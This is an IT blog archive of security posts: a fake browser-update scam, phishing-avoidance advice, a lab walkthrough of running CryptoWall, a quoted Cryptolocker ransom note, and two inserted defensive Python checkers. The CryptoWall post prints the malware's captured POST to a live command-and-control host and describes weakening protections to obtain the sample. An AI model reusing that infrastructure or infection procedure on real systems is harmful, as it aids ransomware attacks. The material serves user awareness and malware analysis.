Archive for category IT

Oh no, I have been told to upgrade my Internet Explorer (but I am running the latest)

So here I am surfing the internet and suddenly I am redirected to a site where I had not intended to go. It tells me I need to upgrade my browser. Very tempting as it tells me I will get better streaming HD video.

Being an IT guy, I know I already have the latest version. I also note that the URL is not a Microsoft URL. The terms have some odd bits in them.

For all the non-IT people out there... use Windows Update. If you want to update your browser, find it on Microsoft's website and install it yourself. Don't follow prompts like this, no matter how convincing it looks.

[Image: hijack]

So, this looks like Microsoft... right?

It says:

You are currently browsing the web with Internet Explorer and your Video Player might be outdated. Please update to the latest version for better performance.
• Superior HD Video Streaming and Hardware Acceleration
• Download Any Movies, Shows or Video Clips
• Critical Security Patch and Bug Fixes
• Richer, more immersive user experiences
Note: This Update is Free and Takes Under a Minute on Broadband. No Restart Required

Looks OK. I have never seen a browser update take less than a minute on most broadband. Since when does Microsoft support you downloading movies? Hmm, looks suspicious.

The URL also looks odd.

http://www.lpmxp2043.com/305133314B7C27473573724271246E3313D5259198A40DE0ED3FE3160363CC97B4FBCE214DE4FF2FF58D81C3BF6B3A99?dv4=mariRM-AU&marketing_fid=MTQwNjEwOTQ2OS0yODUxNWNjYTlkOWQzMzMxZDEwNGJlNzdjZTA5ZTNkOA%3d%3d&tgu_src_lp_domain=www.dnwlistsoft.com&r=1127043608&dv3=&dv2=&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldRPAMr7TCuC3i8fAvaNBuEhnoQzA847kM47AN%ef%bf%bd&affid=12712
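As an added example (not code from the original post), here is a small Python triage script that pulls this URL apart with the standard library only and reports the traits a defender would flag: a host outside Microsoft's domains, an opaque hex path, affiliate and landing-page tracking parameters, and a base64 value that decodes to what looks like a timestamp plus an id. The parameter names come from the URL itself; what they mean is inferred and labelled as such in the comments, and the short vendor allow-list is an assumption.

```python
"""Triage of the fake 'update your browser' redirect URL quoted above.

Added example, not code from the blog. Standard library only.
"""
import base64
import string
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# The URL exactly as quoted in the post.
SUSPECT_URL = (
    "http://www.lpmxp2043.com/305133314B7C27473573724271246E3313D5259198A40DE0ED3FE3160363CC97B4FBCE214DE4FF2FF58D81C3BF6B3A99"
    "?dv4=mariRM-AU"
    "&marketing_fid=MTQwNjEwOTQ2OS0yODUxNWNjYTlkOWQzMzMxZDEwNGJlNzdjZTA5ZTNkOA%3d%3d"
    "&tgu_src_lp_domain=www.dnwlistsoft.com&r=1127043608&dv3=&dv2="
    "&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldRPAMr7TCuC3i8fAvaNBuEhnoQzA847kM47AN%ef%bf%bd"
    "&affid=12712"
)

# Domains a genuine Internet Explorer update would come from (assumption:
# a short allow-list is enough for this check).
VENDOR_DOMAINS = ("microsoft.com", "windowsupdate.com")


def is_vendor_host(host: str) -> bool:
    """True if host is one of VENDOR_DOMAINS or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)


def looks_like_hex_blob(path: str, min_len: int = 32) -> bool:
    """A path that is nothing but a long run of hex digits is a tracking
    token, not a product page."""
    token = path.strip("/")
    return len(token) >= min_len and all(c in string.hexdigits for c in token)


def try_base64(value: str):
    """Decode value as strict base64; return the text if the result is
    non-empty printable ASCII, otherwise None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw or not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if text.isprintable() else None


def triage(url: str) -> dict:
    parts = urlsplit(url)
    # parse_qs percent-decodes values, so %3d%3d becomes "==".
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    findings = []
    host = parts.hostname or ""
    if not is_vendor_host(host):
        findings.append(f"host {host} is not a Microsoft domain")
    if looks_like_hex_blob(parts.path):
        findings.append(f"path is a {len(parts.path.strip('/'))}-char hex token")
    if "affid" in params:
        # Inference: an affiliate id points at pay-per-install style tracking.
        findings.append(f"affiliate id affid={params['affid']}")
    if "tgu_src_lp_domain" in params:
        findings.append(f"landing page attributed to a third domain: {params['tgu_src_lp_domain']}")

    decoded = {}
    stamp = None
    for key, value in params.items():
        text = try_base64(value)
        if text is None:
            continue
        decoded[key] = text
        findings.append(f"{key} is base64 for {text!r}")
        # A leading 10-digit field reads as a Unix timestamp (inference,
        # not documented by the site).
        head = text.split("-", 1)[0]
        if head.isdigit() and len(head) == 10:
            stamp = datetime.fromtimestamp(int(head), tz=timezone.utc)
            findings.append(f"{key} embeds the time {stamp.isoformat()}")
    return {"host": host, "params": params, "decoded": decoded,
            "timestamp": stamp, "findings": findings}


if __name__ == "__main__":
    for line in triage(SUSPECT_URL)["findings"]:
        print("-", line)
```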

What's up with this section in the terms?
2. Delivery of Advertising. By accessing the Sites and downloading the Content, you hereby grant us permission to display promotional information, advertisements, and offers for third party products or services (collectively “Advertising”). The Advertising may include, without limitation, content, offers for products or services, data, links, articles, graphic or video messages, text, software, music, sound, graphics or other materials or services. The timing, frequency, placement and extent of the Advertising changes are determined in our sole discretion. You further grant us permission to collect and use certain aggregate information in accord with our Privacy Policy.  

But no one reads the terms, do they? I noticed that nowhere does it mention Microsoft. It just talks about your browser.

The last line of the terms is also odd. The only place where you might make contact with the software maker has no hyperlinks or contact details:
If you would like to contact us via e-mail, please send a message here

So avoid this and don’t be tricked.

Here are the full terms
LEGAL INFORMATION
ATTENTION! PLEASE READ THIS AGREEMENT CAREFULLY BEFORE ACCESSING THE SITE AND DOWNLOADING ANY CONTENT. IF YOU USE THE SITE OR DOWNLOAD CONTENT YOU AGREE TO EACH OF THE FOLLOWING TERMS AND CONDITIONS.

This is a legally binding contract between you and the installer. By downloading, installing, copying, running, or using any content of dnwlist.com, you are agreeing to be bound by the terms of this Agreement. You are also agreeing to our Privacy Policy. If you do not agree to our terms, you must navigate away from our Sites, you may not download the Content, and you must destroy any copies of the Content in your possession. If you are under 18, you must have your parent or guardian’s permission before you use our Sites or download Content. In an effort to comply with the Children’s Online Privacy Protection Act, we will not knowingly collect personally identifiable information from children under the age of 13. This Agreement may be modified by us from time to time. If you breach any term in this Agreement your right to use the Sites and Content will terminate automatically.

1. The Download Process. Your download and software installation is managed by the Installer. The installer (i) downloads the files necessary to install your software; and (ii) scans your computer for specific files and registry settings to ensure software compatibility with your operating system and other software installed on your computer. Once the installer has been initiated, you will be presented with a welcome screen, it allows you to choose to install the software or cancel out of the process. We may show you one or more partner software offers. You are not required to accept a software offer to receive your download. We may also offer to: (i) change your browser’s homepage; (ii) change your default search provider; and (iii) install icons to your computer desktop. Software we own and our partner’s software may include advertisements within the application.

2. Delivery of Advertising. By accessing the Sites and downloading the Content, you hereby grant us permission to display promotional information, advertisements, and offers for third party products or services (collectively “Advertising”). The Advertising may include, without limitation, content, offers for products or services, data, links, articles, graphic or video messages, text, software, music, sound, graphics or other materials or services. The timing, frequency, placement and extent of the Advertising changes are determined in our sole discretion. You further grant us permission to collect and use certain aggregate information in accord with our Privacy Policy.

3. Your Obligations. You may not use another person’s name or information on our Sites. You agree to use the Sites and Content only for lawful purposes. You agree not to take any action that might compromise the security of the Sites, render the Sites inaccessible to others or otherwise cause damage to the Sites or the Content. You agree not to use the Sites in any manner that might interfere with our or our Partner’s rights. You represent and warrants that (a) you are the owner or an authorized user of the computer that the Content is installed on, (b) you will use the Content, and the Sites only for lawful purposes, and will comply at all times with all applicable federal, state, and local laws and regulations, and (c) you are at least thirteen years of age. Persons under thirteen years of age may not use the Content. You agree not to use any automated or manual process to interfere with, modify, or attempt to interfere with or modify the Content, except to uninstall the same as provided herein. You acknowledge sole responsibility for installing appropriate anti-virus software and other security measures on your computer. You may not use, or export the Content in violation of applicable Spain laws or regulations.

4. Grant of License. We grant you a non-exclusive, non-transferable and non-assignable license to use the Content. You may not rent, lease, sell, redistribute, sublicense or otherwise transfer the Content. You may make only such copies of the Content as are reasonably necessary for your own use, and any copy made by you must bear the same copyright and other proprietary notices that appear on the copy furnished by us.

5. Termination. This license will immediately terminate if you violate any provision of this Agreement. We may also terminate this license at any time without notice.

6. Ownership. We own all intellectual property rights in and to the Content. This license is not a sale and does not render you the owner of a copy of the Content. Ownership of the Content and all components and copies thereof will at all times remain with us, regardless of who may be deemed the owner of the tangible media on which the Content is copied, encoded or otherwise fixed.

7. Disclaimer of Warranties. WE PROVIDE ALL CONTENT “AS IS,” “WITH ALL FAULTS,” AND WITHOUT ANY WARRANTY WHATSOEVER. ALL SITES ARE PROVIDED ON AN “AS IS, AS AVAILABLE” BASIS. WE DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, TITLE OR NON-INFRINGEMENT. WE DO NOT WARRANT ANY PART OF THE CONTENT NOR DO WE REPRESENT THE CONTENT WILL MEET YOUR NEEDS OR THAT ITS OPERATION WILL BE UNINTERRUPTED OR ERROR FREE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE CONTENT IS WITH YOU.

8. Exclusive Remedy. IF YOU ARE DISSATISFIED WITH THE SITES, THE CONTENT OR THESE TERMS AND CONDITIONS, YOUR SOLE AND EXCLUSIVE REMEDY IS TO DISCONTINUE USING THE SITES AND CONTENT.

9. Limitations of Liability. WE ARE NOT LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INCIDENTAL, CONSEQUENTIAL, SPECIAL, INDIRECT, PUNITIVE OR EXEMPLARY DAMAGES, INCLUDING, WITHOUT LIMITATION, EQUIPMENT DOWNTIME, LOSS OF DATA, OR LOST PROFITS, EVEN IF WE HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. BY INSTALLING OR USING THE CONTENT, YOU ACCEPT SOLE RESPONSIBILITY FOR ALL CONSEQUENCES ARISING THEREFROM AND ACKNOWLEDGES THAT NO CLAIM WHATSOEVER WILL BE MADE AGAINST US OR OUR LICENSORS, DISTRIBUTORS, AGENTS, EMPLOYEES OR AFFILIATES.

10. Third-Party Advertisers. We make no representations or warranties concerning third-party or Partner Offers, you agree that we are not responsible or liable for any loss or damage of any sort incurred, or as the result of the delivery or display of the Offers. WE ARE NOT RESPONSIBLE FOR THE TERMS AND CONDITIONS OF ANY THIRD-PARTY OR PARTNER WEBSITE OR OFFERS REGARDLESS OF WHETHER THE OFFER IS HOSTED BY US. WE MAKE AN EFFORT TO SCREEN ALL OFFERS TO ENSURE THE BEST POSSIBLE EXPERIENCE FOR OUR USERS. HOWEVER, WE ARE NOT RESPONSIBLE FOR DEALINGS BETWEEN YOU AND A PARTNER. YOU ARE HOWEVER RESPONSIBLE FOR AND MUST CAREFULLY REVIEW EACH PARTNER OFFER AND READ THEIR TERMS AND CONDITION, AND THE PRIVACY POLICY.

11. Copyright Policy. To be effective, notifications must include the following information: (i) a physical or electronic signature of a person authorized to act on behalf of the owner of the copyright that has been allegedly infringed; (ii) identification of works or materials being infringed; (iii) identification of the content that is claim to be infringing including, information regarding that location of the content that the copyright owner seeks to have removed, with sufficient detail so that the installer is capable of finding and verifying its existence; (iv) contact information about the notifying party including address, telephone number and email address; (v) a statement that the notifying party has a good faith belief that the content is not authorized by the copyright owner, its agent, or the law; and (vi) a statement made under penalty of perjury that the information provided is accurate and the notifying party is authorized to make the complaint on behalf of the copyright owner. Once a complete and proper notice of claimed copyright infringement is received by the installer, it is the installer’s policy to: (i) remove or disable access to the content on the installer’s websites or content directories; and (ii) block a user who has posted infringing content two or more times from posting any further content.

12. Definition of Terms. Offers include promotions, advertisements contests and third-party software presented by our Partners and us. Personally Identifiable Information (PII) is any information that identifies or could be used to identify, contact or locate you. It also includes your credit card number. Partner is an advertiser, or other entity with whom we have a business relationship to provide Offers. Content includes, but is not limited to, our software. User means an individual that has accessed the Sites on which we host our Products or Services. We, Us and Our refers to the installer and its subsidiaries. You and Your refer to each user and his or her agents.

13. Questions or Additional Information. If you have any questions regarding this Agreement or wish to obtain additional information, you can contact us by writing to: If you would like to contact us via e-mail, please send a message to here

14. Laws and Jurisdiction. The present legal notice is subject to Spanish law. The user accepts that the applicable law for the website shall be Spanish law. Any type of proceeding, complaint or conflict derived from the usage or activity of this website shall be solved within the jurisdiction of the Courts of Spain. the installer, reserves the right to make the necessary changes to the present terms and conditions, which will be available in the website.

15. TREATMENT OF PERSONAL INFORMATION. On the other hand, the authors understand that this Web site offers added value services and that in some occasions, a share can be charged for said services to the end user for maintenance of the Web site or said services, but never related to the acquisition of the license of a product. The author also accepts that the above-mentioned electronic means can require the change of the main page or the creation of the direct access (shortcuts) to pages related to this Web site (but never to pages property of the author). The relationship between the author and the Web site can be terminated at anytime prior request of any party. Any manufacturer can request the update or the removal of any software applications offered in this Website.

TREATMENT OF PERSONAL INFORMATION
In compliance with Act 15/1999, 13 December, of Protection of Personal Information and development regulation (hereinafter, the Company), holding company of this Web Site, (hereinafter, the Portal) informs you that the information obtained through the Portal will be handled by the Company, as the party in charge of the File, with the goal of facilitating the requested services, attending to queries, carrying out statistical studies that will allow an improvement in service, carrying out typical administrative tasks, sending information that may result of your interest through bulletins and similar publications, as well as developing sales promotion and publicity activities related to the Portal. The user expressly authorizes the use of their electronic mail address and other means of electronic communication (e.g., mobile telephone) so that the Company may use said means of communication and for the development of informed purposes. We inform you that the information obtained through the Portal will be housed on the servers of the company OVH, SAS, located in Roubaix (France). Upon providing your information, you declare to be familiar with the contents herein and expressly authorize the use of the data for the informed purposes. The user may revoke this consent at any time, without retroactive effects. The Company commits to complying with its obligation as regards secrecy of personal information and its duty to treat the information confidentially, and to take the necessary technical, organizational and security measures to avoid the altering, loss, and unauthorized handling or access of the information, in accordance with the rules established in the Protection of Personal Information Act and the applicable law.

The Company only obtains and retains the following information about visits to our site: The domain name of the provider (ISP) and/or the IP address that gives them access to the network. The date and time of access to our website. The internet address from which the link that leads to our web site originated. The type of browser client. The client’s operating system. This information is anonymous, not being able to be associated with a specific, identified user.

The Portal uses cookies, small information files generated on the user’s computer, with the aim of obtaining the following information: The date and time of the most recent visit to our web page. Security control elements to restricted areas. The user has the option of blocking cookies by means of selecting the corresponding option on their web browser. The Company assumes no responsibility if the deactivation of cookies supposes a loss of quality in service of the Portal.

If you would like to contact us via e-mail, please send a message here

Think before you click

Are you worried someone is going to steal your passwords? Your details? Your money? Your privacy? Your confidential company secrets? Your employer's business? Your livelihood?


You have good reason to worry. Malicious people out there are trying to steal these very things and more, both directly and indirectly. Everyone is a target. They don't care who you are; they want your assets, or they want to leverage you to get to someone else's assets.

They want to trick you, rip you off and make your life a misery. After all, they can make good money wrecking your life.


We, as IT people, help you select antivirus and firewalls and implement security.


Unfortunately you are still the weakest link in the security chain.


So, what rules can help keep you safe?


Think before you click. Stop the click. Avoid the click. Just think a few more seconds before you push that mouse button.

[Image: stop the click]


Whether you are on the internet, in your email, handed a USB drive from an unknown source, or given a friend's external hard disk full of movies, don't click on suspicious things!


Just in case the little voice in your head has not learnt how to warn you about suspicious things, here are our rules. 


It's Free!
If something proclaims it is free, it is likely not. Stop and think: how are they making money? How are they staying in business? How do they get funding? Can you trust their software? Can you trust their ethics?

Emails claiming you have gained access to something for free, web popups offering items for free or free software, can often lead you into a painful mess. If you have not paid for it, then I hope you researched it thoroughly before you jumped into it.


It is often said that if the product is free, you are the product. Turns out that you’re also the lab rat.


If you can’t afford something, don’t go looking for free solutions on the internet. Often you will end up being caught out. Be very careful.


You Won!
If you won something, did you enter to win? Did you really enter that lottery? Are you really the millionth visitor to a website? Can you really make money entering this scheme?

If you click now, do you really get an iPad? If you download this new toolbar, will it make your life better?
Chances are no. You did not enter these things nor have you won anything. Dismiss that email, that internet popup or popup from your program. It is after you.

Panic and click now!
That email you received about illegal activity occurring on your bank account, an accidental bank fee overcharge, your suspended account, an unexpected tax return, an urgent court appearance, an overdue invoice, a postal item you have been waiting for, a shipping notice for a surprise parcel... all have urgency. All want you to click.
Don’t believe it. Don’t follow any link in the email. Don’t open the attachments. Don’t run anything, don’t give it your passwords.
No matter how realistic and correct the logos are, how accurate their data is, treat it with scepticism. The senders spend ages trying to make their messages seem authentic.
Think to yourself, do I actually have an account with these guys? Have I opted for email invoices from them? Do I have a parcel on the way?
If you answer yes, then manually go to a browser, type in their web address as you know it (not from the email), change your passwords online, download your invoice and complete your business under your terms.
Often when you hover over the links in the email or on a webpage, you will see that the link points somewhere other than where it claims to.
Always manually go to a website to logon or change details, never follow an email link.

Missed messages
You have an email about a missed Facebook, Google, phone, mobile or fax message. Attached is the message. Don't open it. Sign into these services and check your messages. Don't use links in the email or look at the attachments. Think: do you actually use these services? Can your mobile send you an email if you miss a message?


Awesome Job offer
You have an email about a job opportunity. You happen to be looking for a job so you click the email, right? Wrong. At best this is a random email sent to you coincidentally and you will get a job that is not legal, is looking to exploit you, or maybe you will not get paid. At worst this thing is going to hack you. Unless you have signed up for job alerts and get emails as expected, don't open these things.


Safe in Web mail
You have a suspect email but it is in your web email, so you are safe to open the attachment as it will not affect your PC. Wrong. It will get you and your PC.


Save money on downloads
Your son/daughter has found a way to download music and movies for free. They can also get you free software like the latest Microsoft Office. You get it from them as you trust them. Whoops.

You have stepped into a trust network which contains people who likely know little about how vulnerable they are. Most of these things are pirated. Many of the tools and websites that support these downloads will hack you and give you additional things inside your download that you don't expect.


Image files, video files and even PDF files can contain viruses. Remember, free is not always free. We make a lot of money cleaning up people's computers after they have downloaded a free "something".


You're Protected
You have antivirus and a firewall. You are safe! No, you are not really. There are thousands of new viruses and Malware detected per hour. If your systems are only a few hours behind, then there are thousands of nasties you can't be protected from. If you choose to download something and force it to download, many times you can override your protections or work beyond the system, making you vulnerable. At best, you are safer and have good odds.


Popups
You will often get website popups offering you special prices or free things. When you click them, you will likely get more popups and you may end up downloading all kinds of things. If you get a popup and push the cancel button to make it go away, you think you are safe? No you are not! The website programmers control everything on the popup. They control the install button and the cancel button. Why can't they make the install button install the software as normal, and make the cancel button install something else without telling you? Of course they can. Your best option is to click the cross in the top right hand corner and close the popup completely.


Toolbars
You have these cool toolbars in Internet Explorer that make your life easier. Sure, except many of them track your movements, download other tools and slow your browser down. Remove the toolbars and don't accept them.


Unexpected presents
You downloaded a program and afterwards you have toolbars, new icons on the desktop and your machine runs slow. Nothing like you expected. Often many "free" tools include other "free" tools. Many of these are Malware. Read the terms of the product you are installing carefully. If the terms for your product "xxx" refer to a different product "yyy", then chances are there is something else bundled into the installation. I have seen many products where you need to carefully read the terms and click decline or cancel many times to get past the "bundled" software to get to the final product you really want. Often you need to unselect tick boxes during the install to get a clean install.


Often during the install you will spot a name or logo of one of the program's "Partner products". It might ask "Do you want to install?", and you say No. Then another product comes up and it says "Would you like to skip this offer?"; as you previously said no, you don't fully read what is on the screen and instinctively press No, and guess what, it installs it. You selected No: you don't want to skip the product. It did as it was told. Be careful of the wordplay that can occur during these installs.


Updates
Updating tools like Java or Adobe (as examples) can now offer you extra toolbars like the Ask toolbar and the like. You need to be careful, as accepting these things not only slows your machine down, it bolts sometimes badly written toolbar code into Internet Explorer (so it causes crashes) and can change your default search page and home web page.


Solving your own IT problems
Many people get tricked into downloading driver update tools, PC fix-up tools or registry repair tools. They usually don't help. These can be dangerous, bog your machine down and download other items.


Known types of attachments are safe
Many email attachments look like harmless PDF files but are not. It is easy to change the icon you see and choose one that you associate with safety. A malicious item can have a "safe" icon. This is further complicated as there are exploits that allow real PDF and JPEG files to carry viruses and Malware. Simply be sceptical of any files you download or receive as attachments.

There are many other tricks we use to avoid these nasties. This short list will get you thinking. Using this list you can avoid some of the bigger nasties like Cryptolocker and Cryptowall.

Think before you click!

 


Infecting myself with Ransomware (Exploring CryptoWall)

What, am I crazy ?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, Wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc.) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URLs faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built-in Internet Explorer protection (it also wanted to kill my download) and finally I have Document-128_712.zip. I extracted the contents: Document-128_712.scr with a PDF icon. I double-click the screensaver file (an executable in disguise) and the file vanished. The mouse changes to an hourglass for a second and then nothing. I refer to Wireshark and Process Monitor. They are blitzing past recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.
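The attachment above (a .scr executable wearing a PDF icon inside a zip) is exactly the case the "Known types of attachments are safe" rule warns about. As an added example, not the blog's own code, here is a mail-gateway style check in Python that judges each archive member by its extension and its first bytes rather than its icon. The archive it inspects is constructed in memory with a member named like Document-128_712.scr whose body is only an MZ header plus padding; no real sample is involved.

```python
"""Mail-gateway style check for the Document-128_712.zip attachment pattern.

Added example, not code from the blog. The archive is constructed in memory:
a member named like the post's Document-128_712.scr whose first bytes are a
Windows executable header, beside a harmless PDF. No real malware is used.
The rule is the one from the post: judge the file by its extension and its
bytes, never by the icon it shows.
"""
import io
import zipfile

# Extensions Windows runs directly on double-click. A .scr "screensaver"
# is an ordinary PE executable under another name.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}

# Magic bytes: a PE executable starts with "MZ", a real PDF with "%PDF".
PE_MAGIC = b"MZ"
PDF_MAGIC = b"%PDF"


def extension_of(name: str) -> str:
    """Lower-cased final extension of an archive member name, or ""."""
    base = name.rsplit("/", 1)[-1]
    dot = base.rfind(".")
    return base[dot:].lower() if dot > 0 else ""


def inspect_archive(data: bytes) -> dict:
    """Return {member name: [reasons]} for every member that should be blocked."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = []
            ext = extension_of(info.filename)
            with zf.open(info) as fh:
                head = fh.read(4)  # only the magic bytes are needed
            if ext in EXECUTABLE_EXTENSIONS:
                reasons.append(f"executable extension {ext}")
            if head.startswith(PE_MAGIC):
                reasons.append("content starts with MZ: a Windows executable whatever the icon")
            if ext == ".pdf" and not head.startswith(PDF_MAGIC):
                reasons.append("named .pdf but does not start with %PDF")
            if reasons:
                verdicts[info.filename] = reasons
    return verdicts


def build_sample_archive() -> bytes:
    """Constructed stand-in for the post's attachment; the .scr body is a
    bare MZ header plus padding, not a working program."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Document-128_712.scr", PE_MAGIC + b"\x90\x00" + b"\x00" * 62)
        zf.writestr("readme.pdf", PDF_MAGIC + b"-1.4\n%%EOF\n")
    return buf.getvalue()


def should_quarantine(data: bytes) -> bool:
    """Gateway decision: hold the message if any member is flagged."""
    return bool(inspect_archive(data))


if __name__ == "__main__":
    for member, reasons in inspect_archive(build_sample_archive()).items():
        print(member, "->", "; ".join(reasons))
```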

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub-folders and then I create a folder called "a", as in C:\a. It is safe, as the process does not seem to double back once it has passed a letter of the alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.

[Screenshot: PDF file]

So here is the .scr file, renamed to bd99547.exe. It is the same file as Document-128_712.scr, as the hashes are the same. It is in the startup group, so if you restart your PC, it continues to encrypt.

[Screenshot: startup]

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

[Screenshot: hidden folder on C:]

So I let this thing continue on and do its job. The exe file located in the Start Menu startup folder and on C:\ will vanish later. I watch as Process Monitor shows me the "exe" file I ran using Windows' built-in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft has already provided everything it needs. It is using Microsoft's own tools to hold us to ransom.

I watch it connect to 199.127.225.232 and do an HTTP POST. This server is called babyslutsnil.com.

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16

HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

<html>
<head>
<title>500 Internal Privoxy Error</title>
<link rel="shortcut icon" href="http://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>
<body>
<h1>500 Internal Privoxy Error</h1>
<p>Privoxy encountered an error while processing your request:</p>
<p><b>Could not load template file <code>forwarding-failed</code> or one of its included components.</b></p>
<p>Please contact your proxy administrator.</p>
<p>If you are the proxy administrator, please put the required file(s) in the <code><i>(confdir)</i>/templates</code> directory. The location of the <code><i>(confdir)</i></code> directory is specified in the main Privoxy <code>config</code> file. (It's typically the Privoxy install directory, or <code>/etc/privoxy/</code>).</p>
</body>
</html>

I can only assume it is trying to send out the RSA encryption key to the remote server.

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

[Screenshot: decrypt files]

Then you find a key in the registry which starts off the same as the exe file name.

[Screenshot: registry]

And then the exes start to vanish and are replaced with the warnings you will see on next reboot.

[Screenshot: startup1]

Then you get invited to go up, pay some money, download another exe file (do you trust it?) with the decryption, and away you go!

[Screenshot: pay]

It uses the Tor network for the website, so there is no way to track these guys. They are anonymous and invisible.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step: FORMAT THE MACHINE. My packet sniffs and process monitoring have shown me that this Malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline, current backups!

Upgrade to Trend Micro Worry Free 9 causes 10 minute stall when plugging in USB storage

On one of our installations, since installing TMWF9, whenever a USB drive (hard disk or flash media) is plugged into the Master server, Explorer stops responding for 10 minutes.

Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).

If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.

From a command prompt, if you try to move to that disk, it stalls. If you try a non-existent disk, it comes back "drive not found". In this way I know I can navigate using CMD and switch between valid drive letters, just not this new volume. It seems the drive has started allocating resources but it is not yet available for use.

If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.

If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.

After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.

There are no events recorded in the EventLog :(


Cryptolocker (Again, new and improved ?)

UPDATE: Be sure to read the comments to this post. I am posting new information and updates as comments. There is a lot of information there.

 

Yes, again we see Cryptolocker. My client emailed me the following “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”

This falls in line with other people's observations, i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout

We have not yet worked out how this version works nor what files have been affected. Here is the text:

!!! YOUR SYSTEM IS HACKED !!!
All your files was encrypted with Cryptolocker!
This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: decrypt-request@mail.ua
You have 3 days to pay for my services. After this period, you will lose all your files.
Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key.
Information for IT-specialist:
Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.

Here is a photo:
[Photo: Img_0804ed2]

This is the nasty email that began it all:
[Screenshot: email]

Real world test of Trend Worry Free Professional

I miss Microsoft ISA/TMG. I miss being able to report staff's internet usage, solve bottlenecks, isolate PCs that have downloaded Malware and all the other general IT admin things that go with this.
Along comes Trend Worry Free Professional which allows you to setup your browser to the external proxy in Trend Micro’s Amazon cloud.

You can set up LDAP integration with your AD and then, after the staff have used it, do reports on their activity.

This all sounds really nice.

So what are the real world issues with this product?
• Using it from South Australia and using proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
• I keep getting certificate popups. I get it for my email (especially using Office 365), I get it for many of the HTTPS sites I use.
• The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group Policy, users can bypass the proxy.
• I have a few websites that "sometimes work". One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
• The built-in reports are very basic. They don't give me enough detail.

Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me so why do I love this product ?
• It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
• I can dump the raw logs into Excel and do my own reports.
• I can have external roaming users logged into this no matter where they are in the world.
• I have control of what happens on the network.

So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.

